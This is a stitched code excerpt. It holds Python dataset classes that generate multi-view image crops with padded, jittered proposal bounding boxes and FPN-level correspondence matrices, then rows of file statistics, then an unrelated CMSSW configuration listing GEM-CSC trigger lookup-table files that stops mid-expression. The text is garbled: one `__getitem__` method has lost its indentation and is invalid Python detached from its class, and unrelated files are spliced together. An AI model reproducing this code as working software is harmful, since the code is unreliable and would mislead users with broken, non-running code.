            bboxs1_13 = np.concatenate([bboxs1_13, pad_bboxs1_13], axis=0)
        pad2 = self.padding_k - bboxs2.shape[0]
        if pad2 > 0:
            pad_bboxs2 = pad_bboxs_with_common(bboxs2, common_bboxs_ids12, self.jitter_ratio, pad2, params2[2], params2[3])
            bboxs2 = np.concatenate([bboxs2, pad_bboxs2], axis=0)
        pad3 = self.padding_k - bboxs3.shape[0]
        if pad3 > 0:
            pad_bboxs3 = pad_bboxs_with_common(bboxs3, common_bboxs_ids13, self.jitter_ratio, pad3, params3[2], params3[3])
            bboxs3 = np.concatenate([bboxs3, pad_bboxs3], axis=0)
        # Integer pixel boxes per view, then per-level assignment for the
        # aware correspondence matrices.
        resized_bboxs1_12 = resize_bboxs(bboxs1_12, params[2], params[3], self.view_size)
        resized_bboxs1_13 = resize_bboxs(bboxs1_13, params[2], params[3], self.view_size)
        resized_bboxs2 = resize_bboxs(bboxs2, params2[2], params2[3], self.view_size)
        resized_bboxs3 = resize_bboxs(bboxs3, params3[2], params3[3], self.view_size_3)
        resized_bboxs1_12 = resized_bboxs1_12.astype(int)
        resized_bboxs1_13 = resized_bboxs1_13.astype(int)
        resized_bboxs2 = resized_bboxs2.astype(int)
        resized_bboxs3 = resized_bboxs3.astype(int)
        bboxs1_12_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_12, self.aware_range, self.aware_start, self.aware_end, -1)
        bboxs1_13_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_13, self.aware_range, self.aware_start, self.aware_end, -1)
        bboxs2_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs2, self.aware_range, self.aware_start, self.aware_end, -2)
        bboxs3_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs3, self.aware_range, self.aware_start, self.aware_end, -3)
        aware_corres_12 = get_aware_correspondence_matrix(bboxs1_12_with_feature_assign, bboxs2_with_feature_assign)
        aware_corres_13 = get_aware_correspondence_matrix(bboxs1_13_with_feature_assign, bboxs3_with_feature_assign)
        bboxs1_12 = bboxs_to_tensor(bboxs1_12, params)  # x1y1x2y2 -> x1y1x2y2 (0, 1)
        bboxs1_13 = bboxs_to_tensor(bboxs1_13, params)  # x1y1x2y2 -> x1y1x2y2 (0, 1)
        bboxs2 = bboxs_to_tensor(bboxs2, params2)  # x1y1x2y2 -> x1y1x2y2 (0, 1)
        bboxs3 = bboxs_to_tensor(bboxs3, params3)  # x1y1x2y2 -> x1y1x2y2 (0, 1)
        img, bboxs1_12, bboxs1_13, params = self.transform[3](img, bboxs1_12, bboxs1_13, params)  # flip
        img2, bboxs2, params2 = self.transform[4](img2, bboxs2, params2)  # flip
        img3, bboxs3, params3 = self.transform[4](img3, bboxs3, params3)  # flip
        img1 = self.transform[5](img)  # color
        img2 = self.transform[6](img2)  # color
        img3 = self.transform[6](img3)  # color
        return img1, img2, img3, bboxs1_12, bboxs1_13, bboxs2, bboxs3, aware_corres_12, aware_corres_13, index, target
class ImageFolderImageAsymBboxAwareMultiJitter1Cutout(DatasetFolderProps):
    def __init__(self, root, ann_file='', img_prefix='', train_props_file='',
                 image_size=0, select_strategy='', select_k=0, weight_strategy='',
                 jitter_prob=0.0, jitter_ratio=0.0,
                 padding_k='', aware_range=[], aware_start=0, aware_end=4, max_tries=0,
                 transform=None, target_transform=None,
                 loader=default_img_loader, cache_mode="no", dataset='ImageNet'):
        """Configure the three-view jitter dataset variant with cutout.

        Mirrors ImageFolderImageAsymBboxAwareMultiJitter1.__init__; the
        transform tuple for this class additionally carries a cutout
        transform (8 elements).

        NOTE(review): padding_k defaults to '' but is used with `//` below,
        and aware_range=[] is a shared mutable default — confirm callers
        always pass real values.
        """
        super(ImageFolderImageAsymBboxAwareMultiJitter1Cutout, self).__init__(root, loader, IMG_EXTENSIONS,
                                                                              ann_file=ann_file, img_prefix=img_prefix,
                                                                              train_props_file=train_props_file,
                                                                              select_strategy=select_strategy, select_k=select_k,
                                                                              transform=transform, target_transform=target_transform,
                                                                              cache_mode=cache_mode, dataset=dataset)
        self.imgs = self.samples
        self.props = self.samples_props  # per-image proposal arrays, index-aligned with samples
        self.select_strategy = select_strategy
        self.select_k = select_k
        self.weight_strategy = weight_strategy
        self.jitter_prob = jitter_prob
        self.jitter_ratio = jitter_ratio
        self.padding_k = padding_k  # number of boxes per view after padding
        self.view_size = (image_size, image_size)
        self.view_size_3 = (image_size//2, image_size//2)  # half-size third view
        self.debug = False
        self.max_tries = max_tries  # retry budget for sampling crops with enough common proposals
        self.least_common = max(self.padding_k // 2, 1)
        self.aware_range = aware_range
        assert len(self.aware_range) == 5, 'Must give P2 P3 P4 P5 P6 size range'
        self.aware_start = aware_start  # starting from 0 means use p2
        self.aware_end = aware_end  # end, if use P6 might be 5
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
path, target = self.samples[index]
image = self.loader(path)
image_size = image.size
image_proposals = self.props[index] # for cur image, numpy array type, [[x1, y1, x2, y2]] x2 = x1 + w - 1
if image_proposals.shape[0] == 0: # if no proposals, insert one single proposal, the whole raw image
image_proposals = np.array([[0, 0, image_size[0] - 1, image_size[1] - 1]])
image_proposals_w_id = append_prop_id(image_proposals) # start from 1
assert len(self.transform) == 8
# transform = (transform_whole_img, transform_img, transform_img_small, transform_flip_flip, transform_flip, transform_post_1, transform_post_2, transform_cutout)
tries = 0
least_common = self.least_common
while tries < self.max_tries:
img, params = self.transform[0](image) # whole image resize
img2, params2 = self.transform[1](image) # random crop resize
img3, params3 = self.transform[2](image) # small random crop resize
params_overlap12 = cal_overlap_params(params, params2)
overlap_props12 = get_overlap_props(image_proposals_w_id, params_overlap12)
selected_image_props12 = select_props(overlap_props12, self.select_strategy, self.select_k) # check paras are
params_overlap13 = cal_overlap_params(params, params3)
overlap_props13 = get_overlap_props(image_proposals_w_id, params_overlap13)
selected_image_props13 = select_props(overlap_props13, self.select_strategy, self.select_k) # check paras are
# TODO: ensure clipped bboxs width and height are greater than 32
if selected_image_props12.shape[0] >= least_common and selected_image_props13.shape[0] >= least_common: # ok
break
least_common = max(least_common // 2, 1)
tries += 1
jittered_selected_image_props12 = jitter_props(selected_image_props12, self.jitter_prob, self.jitter_ratio)
jittered_selected_image_props13 = jitter_props(selected_image_props13, self.jitter_prob, self.jitter_ratio)
bboxs1_12 = clip_bboxs(jittered_selected_image_props12, params[0], params[1], params[2], params[3])
bboxs1_13 = clip_bboxs(jittered_selected_image_props13, params[0], params[1], params[2], params[3])
bboxs2 = clip_bboxs(selected_image_props12, params2[0], params2[1], params2[2], params2[3])
bboxs3 = clip_bboxs(selected_image_props13, params3[0], params3[1], params3[2], params3[3])
common_bboxs_ids12 = get_common_bboxs_ids(bboxs1_12, bboxs2)
common_bboxs_ids13 = get_common_bboxs_ids(bboxs1_13, bboxs3)
pad1_12 = self.padding_k - bboxs1_12.shape[0]
if pad1_12 > 0:
pad_bboxs1_12 = pad_bboxs_with_common(bboxs1_12, common_bboxs_ids12, self.jitter_ratio, pad1_12, params[2], params[3])
bboxs1_12 = np.concatenate([bboxs1_12, pad_bboxs1_12], axis=0)
pad1_13 = self.padding_k - bboxs1_13.shape[0]
if pad1_13 > 0:
pad_bboxs1_13 = pad_bboxs_with_common(bboxs1_13, common_bboxs_ids13, self.jitter_ratio, pad1_13, params[2], params[3])
bboxs1_13 = np.concatenate([bboxs1_13, pad_bboxs1_13], axis=0)
pad2 = self.padding_k - bboxs2.shape[0]
if pad2 > 0:
pad_bboxs2 = pad_bboxs_with_common(bboxs2, common_bboxs_ids12, self.jitter_ratio, pad2, params2[2], params2[3])
bboxs2 = np.concatenate([bboxs2, pad_bboxs2], axis=0)
pad3 = self.padding_k - bboxs3.shape[0]
if pad3 > 0:
pad_bboxs3 = pad_bboxs_with_common(bboxs3, common_bboxs_ids13, self.jitter_ratio, pad3, params3[2], params3[3])
bboxs3 = np.concatenate([bboxs3, pad_bboxs3], axis=0)
resized_bboxs1_12 = resize_bboxs(bboxs1_12, params[2], params[3], self.view_size)
resized_bboxs1_13 = resize_bboxs(bboxs1_13, params[2], params[3], self.view_size)
resized_bboxs2 = resize_bboxs(bboxs2, params2[2], params2[3], self.view_size)
resized_bboxs3 = resize_bboxs(bboxs3, params3[2], params3[3], self.view_size_3)
resized_bboxs1_12 = resized_bboxs1_12.astype(int)
resized_bboxs1_13 = resized_bboxs1_13.astype(int)
resized_bboxs2 = resized_bboxs2.astype(int)
resized_bboxs3 = resized_bboxs3.astype(int)
bboxs1_12_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_12, self.aware_range, self.aware_start, self.aware_end, -1)
bboxs1_13_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_13, self.aware_range, self.aware_start, self.aware_end, -1)
bboxs2_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs2, self.aware_range, self.aware_start, self.aware_end, -2)
bboxs3_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs3, self.aware_range, self.aware_start, self.aware_end, -3)
aware_corres_12 = get_aware_correspondence_matrix(bboxs1_12_with_feature_assign, bboxs2_with_feature_assign)
aware_corres_13 = get_aware_correspondence_matrix(bboxs1_13_with_feature_assign, bboxs3_with_feature_assign)
bboxs1_12 = bboxs_to_tensor(bboxs1_12, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs1_13 = bboxs_to_tensor(bboxs1_13, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs2 = bboxs_to_tensor(bboxs2, params2) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs3 = bboxs_to_tensor(bboxs3, params3) # x1y1x2y2 -> x1y1x2y2 (0, 1)
img, bboxs1_12, bboxs1_13, params = self.transform[3](img, bboxs1_12, bboxs1_13, params) # flip
img2, bboxs2, params2 = self.transform[4](img2, bboxs2, params2) # flip
img3, bboxs3, params3 = self.transform[4](img3, bboxs3, params3) # flip
img1 = self.transform[5](img) # color
img2 = self.transform[6](img2) # color
img3 = self.transform[6](img3) # color
img2_cutout = self.transform[7](img2, bboxs2, self.view_size)
img3_cutout = self.transform[7](img3, bboxs3, self.view_size_3)
return img1, img2_cutout, img3_cutout, bboxs1_12, bboxs1_13, bboxs2, bboxs3, aware_corres_12, aware_corres_13, index, target
class ImageFolderImageAsymBboxAwareMulti3ResizeExtraJitter1(DatasetFolderProps):
    """Dataset yielding four augmented views per image: a resized whole image,
    a random crop, a small random crop, and an extra view resized from the
    random crop (view 4), together with per-view proposal bboxes and
    FPN-level-aware correspondence matrices for pairs (1,2), (1,3), (1,4).

    NOTE(review): relies on module-level helpers defined elsewhere in this
    file (append_prop_id, cal_overlap_params, get_overlap_props, select_props,
    jitter_props, clip_bboxs, get_common_bboxs_ids, pad_bboxs_with_common,
    resize_bboxs, assign_bboxs_to_feature_map,
    get_aware_correspondence_matrix, bboxs_to_tensor).
    """

    def __init__(self, root, ann_file='', img_prefix='', train_props_file='',
                 image_size=0, image3_size=0, image4_size=0, select_strategy='', select_k=0, weight_strategy='',
                 jitter_prob=0.0, jitter_ratio=0.0,
                 padding_k='', aware_range=[], aware_start=0, aware_end=4, max_tries=0,
                 transform=None, target_transform=None,
                 loader=default_img_loader, cache_mode="no", dataset='ImageNet'):
        # Sample list and per-image proposal loading are handled by the base class.
        super(ImageFolderImageAsymBboxAwareMulti3ResizeExtraJitter1, self).__init__(root, loader, IMG_EXTENSIONS,
                                                                                    ann_file=ann_file, img_prefix=img_prefix,
                                                                                    train_props_file=train_props_file,
                                                                                    select_strategy=select_strategy, select_k=select_k,
                                                                                    transform=transform, target_transform=target_transform,
                                                                                    cache_mode=cache_mode, dataset=dataset)
        self.imgs = self.samples  # torchvision-style alias
        self.props = self.samples_props  # per-image proposal arrays
        self.select_strategy = select_strategy
        self.select_k = select_k
        self.weight_strategy = weight_strategy  # NOTE(review): stored but not read in this class
        self.jitter_prob = jitter_prob
        self.jitter_ratio = jitter_ratio
        # NOTE(review): the default padding_k='' would break the integer ops
        # below (// and -); callers presumably pass an int -- TODO confirm.
        self.padding_k = padding_k
        self.view_size = (image_size, image_size)
        self.view_size_3 = (image3_size, image3_size)  # small-crop view size
        self.view_size_4 = (image4_size, image4_size)  # resized-extra view size
        assert image3_size > 0
        assert image4_size > 0
        self.debug = False
        self.max_tries = max_tries
        # Minimum number of proposals each crop must share with the whole view
        # before crop re-sampling stops (relaxed progressively in __getitem__).
        self.least_common = max(self.padding_k // 2, 1)
        self.aware_range = aware_range
        assert len(self.aware_range) == 5, 'Must give P2 P3 P4 P5 P6 size range'
        self.aware_start = aware_start # starting from 0 means use p2
        self.aware_end = aware_end # end, if use P6 might be 5

    def __getitem__(self, index):
        """
        Args:
            index (int): Index

        Returns:
            tuple: (img1, img2, img3, img4, bboxs1_12, bboxs1_13, bboxs1_14,
            bboxs2, bboxs3, bboxs4, aware_corres_12, aware_corres_13,
            aware_corres_14, index, target) where target is class_index of
            the target class.
        """
        path, target = self.samples[index]
        image = self.loader(path)
        image_size = image.size
        image_proposals = self.props[index] # for cur image, numpy array type, [[x1, y1, x2, y2]] x2 = x1 + w - 1
        if image_proposals.shape[0] == 0: # if no proposals, insert one single proposal, the whole raw image
            image_proposals = np.array([[0, 0, image_size[0] - 1, image_size[1] - 1]])
        image_proposals_w_id = append_prop_id(image_proposals) # start from 1
        assert len(self.transform) == 8
        # transform = (transform_whole_img, transform_img, transform_img_small, transform_img_resize, transform_flip_flip, transform_flip, transform_post_1, transform_post_2)
        # Re-sample the two random crops until both overlap enough proposals
        # with the whole-image view; the requirement is halved on each retry.
        # NOTE(review): if max_tries == 0 the loop body never runs and
        # img/params below are unbound -- callers presumably pass >= 1.
        tries = 0
        least_common = self.least_common
        while tries < self.max_tries:
            img, params = self.transform[0](image) # whole image resize
            img2, params2 = self.transform[1](image) # random crop resize
            img3, params3 = self.transform[2](image) # small random crop resize
            params_overlap12 = cal_overlap_params(params, params2)
            overlap_props12 = get_overlap_props(image_proposals_w_id, params_overlap12)
            selected_image_props12 = select_props(overlap_props12, self.select_strategy, self.select_k) # check paras are
            params_overlap13 = cal_overlap_params(params, params3)
            overlap_props13 = get_overlap_props(image_proposals_w_id, params_overlap13)
            selected_image_props13 = select_props(overlap_props13, self.select_strategy, self.select_k) # check paras are
            # TODO: ensure clipped bboxs width and height are greater than 32
            if selected_image_props12.shape[0] >= least_common and selected_image_props13.shape[0] >= least_common: # ok
                break
            least_common = max(least_common // 2, 1)
            tries += 1
        img4 = self.transform[3](img2) # image4 are resized from image 2
        # Jitter only the whole-view copies; the crop views keep the originals.
        jittered_selected_image_props12 = jitter_props(selected_image_props12, self.jitter_prob, self.jitter_ratio)
        jittered_selected_image_props13 = jitter_props(selected_image_props13, self.jitter_prob, self.jitter_ratio)
        # Clip each proposal set to its view's window (params presumably
        # (x, y, w, h) of the crop -- TODO confirm against the transforms).
        bboxs1_12 = clip_bboxs(jittered_selected_image_props12, params[0], params[1], params[2], params[3])
        bboxs1_13 = clip_bboxs(jittered_selected_image_props13, params[0], params[1], params[2], params[3])
        bboxs2 = clip_bboxs(selected_image_props12, params2[0], params2[1], params2[2], params2[3])
        bboxs3 = clip_bboxs(selected_image_props13, params3[0], params3[1], params3[2], params3[3])
        common_bboxs_ids12 = get_common_bboxs_ids(bboxs1_12, bboxs2)
        common_bboxs_ids13 = get_common_bboxs_ids(bboxs1_13, bboxs3)
        # Pad every bbox set up to exactly padding_k entries so batches collate.
        pad1_12 = self.padding_k - bboxs1_12.shape[0]
        if pad1_12 > 0:
            pad_bboxs1_12 = pad_bboxs_with_common(bboxs1_12, common_bboxs_ids12, self.jitter_ratio, pad1_12, params[2], params[3])
            bboxs1_12 = np.concatenate([bboxs1_12, pad_bboxs1_12], axis=0)
        pad1_13 = self.padding_k - bboxs1_13.shape[0]
        if pad1_13 > 0:
            pad_bboxs1_13 = pad_bboxs_with_common(bboxs1_13, common_bboxs_ids13, self.jitter_ratio, pad1_13, params[2], params[3])
            bboxs1_13 = np.concatenate([bboxs1_13, pad_bboxs1_13], axis=0)
        pad2 = self.padding_k - bboxs2.shape[0]
        if pad2 > 0:
            pad_bboxs2 = pad_bboxs_with_common(bboxs2, common_bboxs_ids12, self.jitter_ratio, pad2, params2[2], params2[3])
            bboxs2 = np.concatenate([bboxs2, pad_bboxs2], axis=0)
        pad3 = self.padding_k - bboxs3.shape[0]
        if pad3 > 0:
            pad_bboxs3 = pad_bboxs_with_common(bboxs3, common_bboxs_ids13, self.jitter_ratio, pad3, params3[2], params3[3])
            bboxs3 = np.concatenate([bboxs3, pad_bboxs3], axis=0)
        # View 4 shares view 2's crop window, so its bboxes/params are copies.
        bboxs1_14 = np.copy(bboxs1_12)
        bboxs4 = np.copy(bboxs2)
        params4 = np.copy(params2)
        # Map bboxes into each view's pixel space for feature-level assignment.
        resized_bboxs1_12 = resize_bboxs(bboxs1_12, params[2], params[3], self.view_size)
        resized_bboxs1_13 = resize_bboxs(bboxs1_13, params[2], params[3], self.view_size)
        resized_bboxs1_14 = resize_bboxs(bboxs1_14, params[2], params[3], self.view_size)
        resized_bboxs2 = resize_bboxs(bboxs2, params2[2], params2[3], self.view_size)
        resized_bboxs3 = resize_bboxs(bboxs3, params3[2], params3[3], self.view_size_3)
        resized_bboxs4 = resize_bboxs(bboxs4, params4[2], params4[3], self.view_size_4)
        resized_bboxs1_12 = resized_bboxs1_12.astype(int)
        resized_bboxs1_13 = resized_bboxs1_13.astype(int)
        resized_bboxs1_14 = resized_bboxs1_14.astype(int)
        resized_bboxs2 = resized_bboxs2.astype(int)
        resized_bboxs3 = resized_bboxs3.astype(int)
        resized_bboxs4 = resized_bboxs4.astype(int)
        # Last argument tags padded entries (-1: whole view, -2/-3/-4: other views).
        bboxs1_12_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_12, self.aware_range, self.aware_start, self.aware_end, -1)
        bboxs1_13_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_13, self.aware_range, self.aware_start, self.aware_end, -1)
        bboxs1_14_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_14, self.aware_range, self.aware_start, self.aware_end, -1)
        bboxs2_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs2, self.aware_range, self.aware_start, self.aware_end, -2)
        bboxs3_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs3, self.aware_range, self.aware_start, self.aware_end, -3)
        bboxs4_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs4, self.aware_range, self.aware_start, self.aware_end, -4)
        aware_corres_12 = get_aware_correspondence_matrix(bboxs1_12_with_feature_assign, bboxs2_with_feature_assign)
        aware_corres_13 = get_aware_correspondence_matrix(bboxs1_13_with_feature_assign, bboxs3_with_feature_assign)
        aware_corres_14 = get_aware_correspondence_matrix(bboxs1_14_with_feature_assign, bboxs4_with_feature_assign)
        bboxs1_12 = bboxs_to_tensor(bboxs1_12, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
        bboxs1_13 = bboxs_to_tensor(bboxs1_13, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
        bboxs1_14 = bboxs_to_tensor(bboxs1_14, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
        bboxs2 = bboxs_to_tensor(bboxs2, params2) # x1y1x2y2 -> x1y1x2y2 (0, 1)
        bboxs3 = bboxs_to_tensor(bboxs3, params3) # x1y1x2y2 -> x1y1x2y2 (0, 1)
        bboxs4 = bboxs_to_tensor(bboxs4, params4) # x1y1x2y2 -> x1y1x2y2 (0, 1)
        # Flips transform image and bboxes together; the whole view flips all
        # three of its bbox sets at once so they stay consistent.
        img, bboxs1_12, bboxs1_13, bboxs1_14, params = self.transform[4](img, bboxs1_12, bboxs1_13, bboxs1_14, params) # flip
        img2, bboxs2, params2 = self.transform[5](img2, bboxs2, params2) # flip
        img3, bboxs3, params3 = self.transform[5](img3, bboxs3, params3) # flip
        img4, bboxs4, params4 = self.transform[5](img4, bboxs4, params4) # flip
        img1 = self.transform[6](img) # color
        img2 = self.transform[7](img2) # color
        img3 = self.transform[7](img3) # color
        img4 = self.transform[7](img4) # color
        return img1, img2, img3, img4, bboxs1_12, bboxs1_13, bboxs1_14, bboxs2, bboxs3, bboxs4, aware_corres_12, aware_corres_13, aware_corres_14, index, target
| 49.30965
| 174
| 0.635455
| 5,933
| 46,499
| 4.683128
| 0.063037
| 0.017563
| 0.017132
| 0.011589
| 0.833147
| 0.818643
| 0.804967
| 0.794565
| 0.786791
| 0.770308
| 0
| 0.048803
| 0.268931
| 46,499
| 942
| 175
| 49.361996
| 0.768547
| 0.117572
| 0
| 0.743704
| 0
| 0
| 0.020778
| 0
| 0.005926
| 0
| 0
| 0.004246
| 0.020741
| 1
| 0.041481
| false
| 0
| 0.023704
| 0.002963
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6549bf6aa5becd22a020783eb7a95b2393364ff7
| 8,564
|
py
|
Python
|
L1Trigger/CSCTriggerPrimitives/python/params/gemcscParams.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 13
|
2015-11-30T15:49:45.000Z
|
2022-02-08T16:11:30.000Z
|
L1Trigger/CSCTriggerPrimitives/python/params/gemcscParams.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 640
|
2015-02-11T18:55:47.000Z
|
2022-03-31T14:12:23.000Z
|
L1Trigger/CSCTriggerPrimitives/python/params/gemcscParams.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 51
|
2015-08-11T21:01:40.000Z
|
2022-03-30T07:31:34.000Z
|
"""CMSSW configuration fragment: parameters and LUT file lists for the
Run-3 GEM-CSC integrated local trigger (CSC trigger primitives)."""
import FWCore.ParameterSet.Config as cms

# GEM coincidence pad processors
copadParamGE11 = cms.PSet(
    verbosity = cms.uint32(0),
    maxDeltaPad = cms.uint32(4),
    maxDeltaRoll = cms.uint32(1),
    maxDeltaBX = cms.uint32(0)
)

# GE2/1 uses the same coincidence-pad settings as GE1/1.
copadParamGE21 = copadParamGE11.clone()

## LUTs for the Run-3 GEM-CSC integrated local trigger
gemcscParams = cms.PSet(
    ## convert pad number to 1/2-strip in ME1a
    padToHsME1aFiles = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME1a_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME1a_odd.txt",
    ),
    ## convert pad number to 1/2-strip in ME1b
    padToHsME1bFiles = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME1b_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME1b_odd.txt",
    ),
    ## convert pad number to 1/2-strip in ME21
    padToHsME21Files = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME21_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME21_odd.txt",
    ),
    ## convert pad number to 1/8-strip in ME1a
    padToEsME1aFiles = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME1a_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME1a_odd.txt",
    ),
    ## convert pad number to 1/8-strip in ME1b
    padToEsME1bFiles = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME1b_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME1b_odd.txt",
    ),
    ## convert pad number to 1/8-strip in ME21
    padToEsME21Files = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME21_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME21_odd.txt",
    ),
    ## convert eta partition to minimum wiregroup in ME11
    rollToMinWgME11Files = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_min_wg_ME11_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_min_wg_ME11_odd.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_min_wg_ME11_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_min_wg_ME11_odd.txt",
    ),
    ## convert eta partition to maximum wiregroup in ME11
    rollToMaxWgME11Files = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_max_wg_ME11_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_max_wg_ME11_odd.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_max_wg_ME11_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_max_wg_ME11_odd.txt",
    ),
    ## convert eta partition to minimum wiregroup in ME21
    rollToMinWgME21Files = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_min_wg_ME21_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_min_wg_ME21_odd.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_min_wg_ME21_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_min_wg_ME21_odd.txt",
    ),
    ## convert eta partition to maximum wiregroup in ME21
    rollToMaxWgME21Files = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_max_wg_ME21_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_max_wg_ME21_odd.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_max_wg_ME21_even.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_max_wg_ME21_odd.txt",
    ),
    # lookup tables for the GEM-CSC slope correction
    gemCscSlopeCorrectionFiles = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCSlopeCorr_ME11_even_GE11_layer1.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCSlopeCorr_ME11_even_GE11_layer2.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCSlopeCorr_ME11_odd_GE11_layer1.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCSlopeCorr_ME11_odd_GE11_layer2.txt",
    ),
    # lookup tables for the GEM-CSC slope correction (CSC-consistency shifts)
    gemCscSlopeCosiFiles = cms.vstring(
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_2to1_SlopeShift_ME11_even_GE11_layer1.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_2to1_SlopeShift_ME11_odd_GE11_layer1.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_3to1_SlopeShift_ME11_even_GE11_layer1.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_3to1_SlopeShift_ME11_odd_GE11_layer1.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_2to1_SlopeShift_ME11_even_GE11_layer2.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_2to1_SlopeShift_ME11_odd_GE11_layer2.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_3to1_SlopeShift_ME11_even_GE11_layer2.txt",
        "L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_3to1_SlopeShift_ME11_odd_GE11_layer2.txt",
    ),
    # lookup tables for the GEM-CSC slope correction (consistent-slope variant)
    gemCscSlopeCosiCorrectionFiles = cms.vstring(
